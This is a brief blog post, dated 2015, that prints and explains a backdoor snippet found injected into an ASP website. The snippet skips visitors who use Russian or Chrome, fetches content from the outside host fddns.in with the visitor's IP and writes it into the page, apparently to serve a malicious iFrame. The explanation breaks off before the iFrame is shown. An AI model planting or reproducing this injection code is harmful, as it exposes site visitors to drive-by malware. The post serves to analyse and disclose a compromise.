پیر، 31 اگست، 2015

back door source

<% function IP2Long(ipadr) result=0 faktorer=split(ipadr,".") for ix=0 to 3 expn=3-ix result=result + faktorer(ix) * 256 ^ expn next If result < 0 Then result = result + 4294967296 IP2Long=result end function min=100000000 max=9999999999 Randomize r_my_num=int((max-min+1)*rnd+min) If Not InStr(Request.ServerVariables("HTTP_ACCEPT_LANGUAGE"), "ru") Then If Not InStr(Request.ServerVariables("HTTP_USER_AGENT"), "Chrome") Then set objSrvHTTP = CreateObject("MSXML2.ServerXMLHTTP") v_srl = "fddns.in" objSrvHTTP.open "GET","http://"&v_srl&":80/ferdrez.php?di="&IP2Long(Request.ServerVariables("HTTP_X_FORWARDED_FOR"))&"&dr="&r_my_num, false objSrvHTTP.send Response.Write(objSrvHTTP.ResponseText) End If End If The most interesting part is in bold. This code was not on the top of the page, nor on the bottom. It was added specifically in a content block that will always execute. Basically it will only show the iFrame when the visitor of the website is not using the Russian language on his PC and when he is not using Chrome. This will include the following iFrame:

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